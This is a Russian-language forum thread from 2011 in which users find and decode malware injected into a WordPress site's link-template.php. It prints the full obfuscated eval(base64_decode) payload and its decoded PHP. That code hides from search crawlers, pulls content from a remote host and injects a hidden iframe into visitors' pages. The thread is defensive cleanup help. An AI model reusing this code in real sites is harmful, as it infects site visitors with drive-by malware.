Перейти к содержимому


Партнерская программа Kredov

С сайта поперли вирусы

#31 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0
0

Отправлено 10 Февраль 2011 - 08:29

Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...


Сегодня проверю еще весь твой архив, вместе с плагинами. Возможно там где сидит основной код, который "долбит" тему.
Наверняка в зашифрованном виде.
Но уже проще, мы знаем результат его работы, что именно искать.

Но кода вируса в РНР я не нашел!


Я уже на это и не расчитывал когда писал P.S. , не все так просто.
  • 0

#32 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 11:31

Открой вот этот файл \wp-includes\link-template.php

Найди:

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInpveGdf
cm9kIikgJiYgIWZ1bmN0aW9uX2V4aXN0cygiZW1wcl9heGYiKSAmJiAhZnVuY3Rpb25fZXhpc3RzKCJx
b
2d1bV9ubmMiKSAmJiAhaXNzZXQoJEdMT0JBTFNbImJiZiJdKSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJ
F
9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwiZ29vZ2xlYm90IikgPT09IGZhbHNlICYmIEBzdHJwb3
M
oc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJtc25ib3QiKSA9PT0gZmFsc2U
g
JiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksInlhaG9vIikg
P
T09IGZhbHNlICYmICFpc3NldCgkX0NPT0tJRVsidHBrIl0pICl7JEdMT0JBTFNbImJiZiJdID0gMTtzZ
X
Rjb29raWUoInRwayIsIDEsIHRpbWUoKSszNjAwKjI0KjEsICIvIik7ICAgICAgICAgICAgZnVuY3Rpb2
4
gZW1wcl9heGYoJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICA
g
ICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAg
I
CAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgI
C
AgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgIC
A
gICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMik
p
Ow0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsg
J
HVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmO
C
ApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IE
B
zdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICA
g
ICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7
D
QogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNoc
i
gwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgIC
A
gaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICA
k
c2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3pp
c
CA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgI
C
AgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgIC
A
gICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0
N
CiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAg
I
GZ1bmN0aW9uIHFvZ3VtX25uYyggJHVybCApIHsNCg0KLyogICAgICBpZiAoZnVuY3Rpb25fZXhpc3RzK
C
JjdXJsX2luaXQiKSkNCiAgICAgICAgew0KICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgkdXJsKTsNCi
A
gICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICA
g
ICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7DQogICAgICAgICAgICAk
Y
3VybF9yZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQogICAgICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7D
Q
ogICAgICAgICAgICBpZiAoJGN1cmxfcmVzdWx0KSByZXR1cm4gJGN1cmxfcmVzdWx0Ow0KICAgICAgIC
B
9DQoNCiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICA
g
ICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAg
I
CAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNC
i
AgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVC
A
kdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1s
i
aG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxy
X
G4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCwgJGVycm5vL
C
AkZXJyc3RyLCA1KTsNCiAgICAgICAgaWYgKCEkZnApIHJldHVybiBmYWxzZTsNCiAgICAgICAgQGZwdX
R
zKCRmcCwgJHF1ZXJ5KTsNCiAgICAgICAgQHNvY2tldF9zZXRfdGltZW91dCAoJGZwLCA1LCAwKTsNCiA
g
ICAgICAgJHNfcmV0Y29kZSA9IEBzdWJzdHIgKEBmZ2V0cyAoJGZwLCA0MDk2KSwgOSwgMyk7DQogICAg
I
CAgIGlmICgkc19yZXRjb2RlezB9IDw+ICIyIikge3JldHVybiBGQUxTRTt9DQogICAgICAgIHdoaWxlI
C
ghIEBmZW9mICgkZnApKQ0KICAgICAgICB7DQogICAgICAgICAgICBpZiAoIlxyXG4iID09PSBAZmdldH
M
gKCRmcCwgNDA5NikpIHticmVhazt9DQogICAgICAgIH0NCiAgICAgICAgJHNvY2tldF9yZXN1bHQgPSA
i
IjsNCiAgICAgICAgd2hpbGUgKCEgQGZlb2YgKCRmcCkpIHsNCiAgICAgICAgICAgICRzb2NrZXRfcmVz
d
Wx0IC49IEBmZ2V0cyAoJGZwLCA0MDk2KTsNCiAgICAgICAgfQ0KICAgICAgICBAZmNsb3NlKCRmcCk7D
Q
ogICAgICAgIGlmICgkc29ja2V0X3Jlc3VsdCkgcmV0dXJuICRzb2NrZXRfcmVzdWx0Ow0KICAgIH0NCi
A
gICBmdW5jdGlvbiB6b3hnX3JvZCgkZW5mKXtnbG9iYWwgJGloZGVnX2J2ZztyZXR1cm4gcHJlZ19yZXB
s
YWNlKCIjKDwvdGFibGU+Lio8dGQ+fDwvdGFibGU+fDwvZGl2PltePD5dKjxkaXZbXjw+XSo+fDwvYm9k
e
T4pI2lzIiwgIiQxIiAuICRpaGRlZ19idmcsIGVtcHJfYXhmKCRlbmYpLCAxKTsNCiAgICB9JGloZGVnX
2
J2Zz1xb2d1bV9ubmMoYmFzZTY0X2RlY29kZSgiYUhSMGNEb3ZMMmRqYjNWdWRHVnlMbU51TDJsdVptOH
V
jR2h3IikgLiAiP2k9IiAuICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKTtAcHJlZ19tYXRjaCgiIzxvcGV
u
PiguKik8L2Nsb3NlPiMiLCAkaWhkZWdfYnZnLCAkbWF0Y2hlcyk7JGloZGVnX2J2Zz0gaXNzZXQoJG1h
d
GNoZXNbMV0pID8gJG1hdGNoZXNbMV0gOiAiIjtpZiAoJGloZGVnX2J2ZykgIG9iX3N0YXJ0KCJ6b3hnX
3
JvZCIpO30="));


Попробуй удалить этот кусок кода.

Сейчас еще попробую расшифровать эту хрень, для 100% уверенности.
  • 0

#33 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 11:40

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.

if(function_exists("ob_start") && !function_exists("zoxg_rod") && !function_exists("empr_axf") && !function_exists("qogum_nnc") && !isset($GLOBALS["bbf"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["tpk"]) ){$GLOBALS["bbf"] = 1;setcookie("tpk", 1, time()+3600*24*1, "/");			function empr_axf($gzencode_arg)
{
$x = @ord(@substr($gzencode_arg, 3, 1));
$shift = 10;
$shift2 = 0;
if( $x&4 )
{
$unpack=@unpack("v", substr($gzencode_arg, 10, 2));
$unpack=$unpack[1]; $shift+= 2 + $unpack;
}
if( $x&8 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&16 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&2 )
{
$shift += 2;
}
$gzip = @gzinflate(@substr($gzencode_arg, $shift));
if($gzip === FALSE)
{
$gzip = $gzencode_arg;
}
return $gzip;
}

function qogum_nnc( $url ) {

/* if (function_exists("curl_init"))
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$curl_result = curl_exec ($ch);
curl_close($ch);
if ($curl_result) return $curl_result;
}

if (@ini_get("allow_url_fopen"))
{
$file_result = @file_get_contents($url);
if ($file_result) return $file_result;
} */

$url_info = parse_url($url);
$query = "GET $url HTTP/1.0\r\n";
$query .= "Host: " . $url_info["host"] . "\r\n";
$query .= "Connection: Close\r\n\r\n";
$fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5);
if (!$fp) return false;
@fputs($fp, $query);
@socket_set_timeout ($fp, 5, 0);
$s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
if ($s_retcode{0} <> "2") {return FALSE;}
while (! @feof ($fp))
{
if ("\r\n" === @fgets ($fp, 4096)) {break;}
}
$socket_result = "";
while (! @feof ($fp)) {
$socket_result .= @fgets ($fp, 4096);
}
@fclose($fp);
if ($socket_result) return $socket_result;
}
function zoxg_rod($enf){global $ihdeg_bvg;return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $ihdeg_bvg, empr_axf($enf), 1);
}$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);@preg_match("#<open>(.*)</close>#", $ihdeg_bvg, $matches);$ihdeg_bvg= isset($matches[1]) ? $matches[1] : "";if ($ihdeg_bvg) ob_start("zoxg_rod");}

  • 0

#34 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:01

Еще в теме e-storage-plus есть три больших вхождения eval(base64_decode
Но не думаю что они работают, тема активирована другая. Можешь удалить ее, все равно не используешь.
  • 0

#35 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 10 Февраль 2011 - 12:03

данный кусок кода подключает http://gcounter.cn/info.php и отсюда идет атака
  • 0

#36 softgaz

softgaz
    Topic Starter
  • Пользователь
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:04

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.


Удалил - все работает!
Но поступил проще: скопировал этот файл с другого своего сайта!
СПАСИБО ОГРОМНЕЙШЕЕ!!!!!!!!!
ПРОСТО НЕ ЗНАЮ - КАК БЛАГОДАРИТЬ!!!!!!!!!!
ПИВО ПРИ ВСТРЕЧЕ - ГАРАНТИРУЮ!!!!!!!!!!!!!
  • 0

#37 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:12

данный кусок кода примитивно подключает http://gcounter.cn/info.php


По этому адресу и есть вирус.
То есть работал он получается в несколько этапов.
Вначале подгружал http://gcounter.cn/info.php, а с него уже брал код вставки в исходник.
<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>

Вполне возможно, что данный код еще и менялся постоянно, или исчезал на время, отследить тяжело.

Короче нормальную хрень ты подхватил! ;)
Я с таким, до этого не сталкивался, обычно вирус тупо прописывался в файлы шаблона.
  • 0

#38 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:27

Причем URL http://gcounter.cn/info.php зашифрован дважды.
$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw")


Красивый вирусняк такой. ;)
  • 0

#39 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 13:22

Сообщение 33 , код посмотрите уже расшифрованный в конце.
  • 0

#40 softgaz

softgaz
    Topic Starter
  • Пользователь
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 13:25

А почемы вы решили что дважды?


Я другое никак не пойму: а почему дата файла не поменялась?! Я ж все искал в соответствии с инструкциями Яндекса: смотри по датам изменения файлов! А они не поменялись - как такое возможно?
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Оформление форума – IPBSkins.ru